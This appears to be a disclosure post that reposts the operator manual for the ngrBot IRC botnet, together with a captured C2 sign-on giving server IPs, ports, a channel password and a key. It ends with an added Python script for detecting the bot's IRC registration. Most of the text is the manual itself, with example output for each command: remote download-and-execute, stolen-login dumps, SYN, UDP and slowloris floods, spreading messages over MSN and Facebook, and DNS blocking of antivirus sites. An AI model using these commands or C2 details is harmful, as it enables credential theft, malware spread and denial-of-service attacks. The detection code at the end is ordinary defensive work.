Older version of ngrBot with the original manual included
Remote Host       Port Number
199.15.234.7      80
64.186.134.161    7834

PASS puto
NICK n{US|XPa}civmqel
USER civmqel 0 0 :civmqel
JOIN #dr3 ngrBot
Now talking in #dr3
Topic On: [ #dr3 ] [ > Bot attack ! || reporte 23/01/2012 : http://scan4you.net/result.php?id=a3060_16a5mg || manual: http://adgass.edu.gh/ngrbot.txt ]
Topic By: [ root3d ]
(root3d) /lusers
Topic says everything you have to know about ngrBot lol
Here I'm including the manual just in case he deletes it
Commands:
#p - pdef(also known as the botkiller/protection)
#r - ruskill(shows what bots you ruskilled (when selling installs you use to keep your bots)
#f - ftps
#l - formgrabber logins
#s - usb, msn, facebook

Note: parameters within "[" and "]" are required, and parameters within "<" and ">" are optional.

!dl [url] <md5> <-r> <-n>
The bot downloads and executes a file from the specified URL.
Parameters
  url   URL of the file to download and execute
  md5   optional MD5 hash of the file to download for integrity check, the bot will not redownload a file with the same hash until reboot
  -r    Enable RusKill on downloaded file
  -n    Disables PDef+ on the system until reboot or until it is manually re-enabled
Example
  [00:00:00] <You> !dl http://example.com/test.exe
  [00:00:05] <{RU|W7a}abcdefg> [d="http://example.com/test.exe" s="94208 bytes"] Executed file "C:\Users\Administrator\AppData\Roaming\ABCD.tmp"
  [00:00:10] <You> !dl http://example.com/bot.exe -r
  [00:00:15] <{RU|W7a}abcdefg> [d="http://example.com/bot.exe" s="188416 bytes"] Executed file "C:\Users\Administrator\AppData\Roaming\1234.tmp"
  [00:00:15] <{RU|W7a}abcdefg> [Ruskill]: Detected File: "C:\Documents and Settings\Administrator\Application Data\1234.tmp"
  [00:00:16] <{RU|W7a}abcdefg> [Ruskill]: Detected File: "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lsass.exe"
  [00:00:16] <{RU|W7a}abcdefg> [Ruskill]: Detected Reg: "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  [00:00:17] <{RU|W7a}abcdefg> [Ruskill]: Detected DNS: "cnc.example.com"
--------------------------------------------------------------------------------
!up [url] [md5] <-r>
The bot updates its file, but the update does not take effect until the system is restarted.
Parameters
  url   URL of the file to update to
  md5   MD5 hash of the update file
  -r    Reboot immediately
Example
  [00:00:00] <You> !up http://example.com/test.exe 58050954C432B8786284C4E0C7011A57
  [00:00:05] <{RU|W7a}abcdefg> [d="http://example.com/update.exe" s="87040 bytes"] Update error: MD5 mismatch (857526760C0E67BB502B7183DEE52767 != 58050954C432B8786284C4E0C7011A57)
  [00:00:15] <You> !up http://example.com/test.exe 58050954C432B8786284C4E0C7011A57
  [00:00:20] <{RU|W7a}abcdefg> [d="http://example.com/update.exe" s="94208 bytes"] Updated bot file "C:\Users\Administrator\AppData\Roaming\Zyxwvu.exe"
--------------------------------------------------------------------------------
!die
The bot disconnects from the IRC server and does not reconnect until its system reboots.
Example
  [00:00:00] <You> !die
  [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) Quit (Connection reset by server)
--------------------------------------------------------------------------------
!rm
The bot will remove itself from the system.
Example
  [00:00:00] <You> !rm
  [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) Quit (Connection reset by server)
--------------------------------------------------------------------------------
!m [state]
Enable/disable all output to IRC regarding to commands and features.
Parameters
  state   Enable (on) or disable (off) muting of all output to IRC
Example
  [00:00:00] <You> !m on
  [00:00:05] <You> !v
  [00:00:10] <You> !m off
  [00:00:15] <You> !v
  [00:00:16] <{RU|W7a}abcdefg> [v="1.0.3" c="You" h="58050954C432B8786284C4E0C7011A57" p="C:\Users\Administrator\AppData\Roaming\Zyxwvu.exe"]
--------------------------------------------------------------------------------
!v
The bot displays its version, customer name, the MD5 hash of its file, and its installed filepath.
Example
  [00:00:00] <You> !v
  [00:00:01] <{RU|W7a}abcdefg> [v="1.0.3" c="You" h="58050954C432B8786284C4E0C7011A57" p="C:\Users\Administrator\AppData\Roaming\Zyxwvu.exe"]
--------------------------------------------------------------------------------
!vs [url] [state]
The bot creates a browser instance and visits the specified link.
Parameters
  url     URL to open
  state   Open in a visible (1) or invisible (0) window
Example
  [00:00:00] <You> !vs http://example.com/ 0
  [00:00:01] <{RU|W7a}abcdefg> [Visit]: Visited "http://example.com/"
--------------------------------------------------------------------------------
!rc <-n|-g>
The bot disconnects from the IRC server and waits 15 seconds before reconnecting.
Parameters
  -n   Only reconnect if the bot is currently marked as "new"
  -g   Only reconnect if the bot did not previously succeed in determining its country using GeoIP
Example
  [00:00:00] <You> !rc
  [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) Quit (Connection reset by server)
  [00:00:16] * <{RU|W7a}gfedcba> (gfedcba@127.0.0.1) has joined #boss
  [00:00:25] <You> !rc -g
  [00:00:26] * <{ESP|W7a}abcdefg> (abcdefg@127.0.0.2) Quit (Connection reset by server)
  [00:00:41] * <{MX|W7a}gfedcba> (gfedcba@127.0.0.2) has joined #boss
--------------------------------------------------------------------------------
!j [<[rule] [options]> channel] <key>
The bot joins the specified channel. If rules are specified, the bot will only join if the rules apply to it.
Parameters
  rule      Optional rule for the bot to check for. Supported options are -c (country) and -v (version)
  options   Options for selected rule
            With -c, you can put a single or multiple comma-separated country code(s)
            With -v, you can put a single or multiple comma-separated version(s)
  channel   Channel to join
  key       Key of channel to join
Example
  [00:00:00] <You> !j #test k3y
  [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test
  [00:00:05] <You> !j -c RU #test2 k3y
  [00:00:10] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test2
  [00:00:11] <You> !j -c US,GB,AU,CA,RU #test3 k3y
  [00:00:15] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test3
  [00:00:15] <You> !j -v 1.0.3 #test4 k3y
  [00:00:16] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test4
--------------------------------------------------------------------------------
!p [<[rule] [options]> channel]
The bot parts the specified channel.
Parameters
  rule      Optional rule for the bot to check for. Supported options are -c (country) and -v (version)
  options   Options for selected rule
            With -c, you can put a single or multiple comma-separated country code(s)
            With -v, you can put a single or multiple comma-separated version(s)
  channel   Channel to part
Example
  [00:00:00] <You> !p #test
  [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test
  [00:00:05] <You> !p -c RU #test2
  [00:00:06] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test2
  [00:00:10] <You> !p -c US,GB,AU,CA,RU #test3
  [00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test3
  [00:00:15] <You> !p -v 1.0.3 #test4
  [00:00:16] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test4
--------------------------------------------------------------------------------
!s <rule>
The bot joins the channel for its country (e.g. Russian bots (RU) join #RU).
Parameters
  rule   Optional rule for the bot to sort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)
Example
  [00:00:00] <You> !s
  [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #RU
  [00:00:05] <You> !s -o
  [00:00:06] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #W7
  [00:00:10] <You> !s -u
  [00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #admin
  [00:00:15] <You> !s -v
  [00:00:16] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #1.0.3
--------------------------------------------------------------------------------
!us <rule>
The bot parts the channel for its country (e.g. Russian bots (RU) part #RU).
Parameters
  rule   Optional rule for the bot to unsort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)
Example
  [00:00:00] <You> !us
  [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #RU
  [00:00:05] <You> !us -o
  [00:00:06] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #W7
  [00:00:10] <You> !us -u
  [00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #admin
  [00:00:10] <You> !us -v
  [00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #1.0.3
--------------------------------------------------------------------------------
!mod [module] [state]
Enable/disable modules that use hooks.
Note: disabling bdns will only unblock AV and other preset sites, not sites set using the !mdns command.
Parameters
  module   Module to change. Supported modules: msn, msnu, pdef, iegrab, ffgrab, ftpgrab, bdns, usbi
  state    Enable (on) or disable (off) module
Example
  [00:00:00] <You> !mod ftpgrab off
--------------------------------------------------------------------------------
!stats <-l|-s>
Retrieves statistics for spreading and/or login grabbing. If no parameters are specified, it will display both.
Parameters
  -l   Display login grabber stats
  -s   Display spreading stats
Example
  [00:00:00] <You> !stats
  [00:00:01] <{RU|W7a}abcdefg> [usb="3" msn="10" http="2" total="15"]
  [00:00:02] <{RU|W7a}abcdefg>
--------------------------------------------------------------------------------
!logins <site|-c>
Retrieves all grabbed and cached logins and prints them to channel or PM. Can also be used to clear login cache.
Parameters
  site   Site to retrieve logins for (case insensitive, see here for the list of sites)
  -c     Clear login cache
Example
  [00:00:00] <You> !logins
  [00:00:01] <{RU|W7a}abcdefg> [Logins]: Facebook ->> noob@mail.ru : password123
  [00:00:02] <{RU|W7a}abcdefg> [Logins]: YouTube ->> noob@mail.ru : password321
  [00:00:05] <You> !logins facebook
  [00:00:06] <{RU|W7a}abcdefg> [Logins]: Facebook ->> noob@mail.ru : password123
--------------------------------------------------------------------------------
!stop
The bot will end all running flood tasks.
Example
  [00:00:00] <You> !udp example.com 80 60
  [00:00:01] <{RU|W7a}abcdefg> [UDP]: Starting flood on "example.com:80" for 60 second(s)
  [00:00:30] <You> !stop
  [00:00:31] <{RU|W7a}abcdefg> [UDP]: Finished flood on "example.com:80"
--------------------------------------------------------------------------------
!ssyn [host] [port] [seconds]
See here.
Parameters
  host      Host to flood with SYN requests
  port      Port to flood. If 0, the bot uses a random port
  seconds   Number of seconds to flood the target
Example
  [00:00:00] <You> !ssyn example.com 80 60
  [00:00:01] <{RU|W7a}abcdefg> [SYN]: Starting flood on "example.com:80" for 60 second(s)
  [00:01:01] <{RU|W7a}abcdefg> [SYN]: Finished flood on "example.com:80"
--------------------------------------------------------------------------------
!udp [host] [port] [seconds]
See here.
Parameters
  host      Host to flood with UDP packets
  port      Port to flood. If 0, the bot uses a random port
  seconds   Number of seconds to flood the target
Example
  [00:00:00] <You> !udp example.com 80 60
  [00:00:01] <{RU|W7a}abcdefg> [UDP]: Starting flood on "example.com:80" for 60 second(s)
  [00:01:01] <{RU|W7a}abcdefg> [UDP]: Finished flood on "example.com:80"
--------------------------------------------------------------------------------
!slow [host] [minutes]
See here.
Parameters
  host      Host to flood using slowloris
  minutes   Number of minutes to flood the target
Example
  [00:00:00] <You> !slow example.com 3
  [00:00:01] <{RU|W7a}abcdefg> [Slowloris]: Starting flood on "example.com" for 3 minutes
  [00:03:01] <{RU|W7a}abcdefg> [Slowloris]: Finished flood on "example.com"
--------------------------------------------------------------------------------
!msn.int [interval]
Set the number of MSN messages in a conversation before one is changed with your spreading message. See here for more information.
Note: use '#' for a random interval between 1 and 9.
Parameters
  interval   Number of MSN messages before spread
Example
  [00:00:00] <You> !msn.int 3
  [00:00:01] <{RU|W7a}abcdefg> [MSN]: Updated MSN spread interval to "3"
--------------------------------------------------------------------------------
!msn.set [message]
Set the message that will be used for MSN spreading. See here for more information.
Note: use '#' for a random digit and '*' for a random lowercase letter.
Parameters
  message   Message to spread via MSN
Example
  [00:00:00] <You> !msn.set LOL http://example.com/img###/*****/DSC0001.jpg
  [00:00:01] <{RU|W7a}abcdefg> [MSN]: Updated MSN spread message to "LOL http://example.com/img583/jgody/DSC0001.jpg"
--------------------------------------------------------------------------------
!http.int [interval]
Set the number of Facebook messages in a conversation before one is changed with your spreading message. See here for more information.
Note: use '#' for a random interval between 1 and 9.
Parameters
  interval   Number of Facebook messages before spread
Example
  [00:00:00] <You> !http.int 3
  [00:00:01] <{RU|W7a}abcdefg> [MSN]: Updated HTTP spread interval to "3"
--------------------------------------------------------------------------------
!http.set [message]
Set the message that will be used for Facebook spreading. See here for more information.
Note: use '#' for a random digit and '*' for a random lowercase letter.
Parameters
  message   Message to spread via Facebook
Example
  [00:00:00] <You> !http.set LOL http://example.com/img###/*****/DSC0001.jpg
  [00:00:01] <{RU|W7a}abcdefg> [HTTP]: Updated HTTP spread message to "LOL http://example.com/img583/jgody/DSC0001.jpg"
--------------------------------------------------------------------------------
!mdns [url|[domain1 <domain2|ip2>]|[ip1 <ip2>]]
The bot will block access to or redirect the specified domain/IP address.
Note: domain to domain, domain to IP address, and IP address to IP address redirects work. IP address to domain redirection does not yet work.
Note: it must be the exact domain, for example "example.com" will not include "www.example.com". Wildcard support will be added in an update.
Parameters
  url       Plaintext file with one redirect/blocking rule per line, rules are formatted in the same way as the command parameters.
  domain1   Requests for this domain will be redirected to domain2 or ip2 if they are set, otherwise it is blocked
  ip1       Requests for this IP address will be redirected to ip2 if it is set, otherwise it is blocked
  domain2   DNS queries for domain1 will be redirected to this domain if set
  ip2       DNS queries for ip1 or domain1 will be redirected to this IP address if set
Example
  [00:00:00] <You> !mdns mail.example.com
  [00:00:01] <{RU|W7a}abcdefg> [DNS]: Blocked "mail.example.com"
  [00:00:05] <You> !mdns http://www.example.com http://www.mysite.com
  [00:00:06] <{RU|W7a}abcdefg> [DNS]: Redirected "www.example.com" to "www.mysite.com"
  [00:00:10] <You> !mdns 127.0.0.1 127.0.0.2
  [00:00:11] <{RU|W7a}abcdefg> [DNS]: Redirected "127.0.0.1" to "127.0.0.2"

Hosting info:
http://whois.domaintools.com/64.186.134.161
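
The sign-on captured at the top of this post (PASS, a NICK shaped like n{US|XPa}civmqel, a USER that repeats the nick's random tail, then a keyed JOIN) is distinctive enough to flag in IRC traffic. The Python below is an added example for defenders, not code from the original post or from ngrBot. Reading the leading "n" as the manual's "new" marker and the trailing "a" as the admin flag is an assumption based on the !rc -n and !s -u entries, and the second client in the sample is constructed.

```python
import re

# Nick layout seen on this page: optional "n", {COUNTRY|OS + one-letter flag}, random ident.
NICK_RE = re.compile(r"^(n)?\{([A-Z]{2,3})\|([A-Z0-9]+)([a-z])?\}([a-z]+)$")

def parse_nick(nick):
    """Split an ngrBot-style nick into its fields, or return None if it does not fit."""
    m = NICK_RE.match(nick)
    if not m:
        return None
    new, country, os_tag, flag, ident = m.groups()
    # Assumption: "n" = bot marked as new, flag "a" = running as admin.
    return {"new": bool(new), "country": country, "os": os_tag,
            "admin": flag == "a", "ident": ident}

def find_registrations(lines):
    """Scan client-to-server IRC lines of one TCP stream for the bot's sign-on."""
    hits, state = [], {}
    for raw in lines:
        parts = raw.strip().split()
        if not parts:
            continue
        cmd, args = parts[0].upper(), parts[1:]
        if cmd == "PASS" and args:
            state = {"password": args[0]}
        elif cmd == "NICK" and args:
            state["nick"], state["user_ok"] = parse_nick(args[0]), False
        elif cmd == "USER" and args and state.get("nick"):
            # The bot reuses the nick's random tail as its username.
            state["user_ok"] = args[0] == state["nick"]["ident"]
        elif cmd == "JOIN" and args and state.get("user_ok"):
            hits.append({**state["nick"], "password": state.get("password"),
                         "channel": args[0],
                         "key": args[1] if len(args) > 1 else None})
            state = {}
    return hits

# The first four lines are the capture from this post; the last three are a
# constructed benign client for contrast.
SAMPLE = [
    "PASS puto",
    "NICK n{US|XPa}civmqel",
    "USER civmqel 0 0 :civmqel",
    "JOIN #dr3 ngrBot",
    "NICK alice",
    "USER alice 0 * :Alice",
    "JOIN #linux",
]

if __name__ == "__main__":
    for hit in find_registrations(SAMPLE):
        print(hit)
```

The same nick pattern also matches the {RU|W7a}abcdefg form used throughout the manual's examples, so it can be applied to channel join/quit logs as well as to the sign-on.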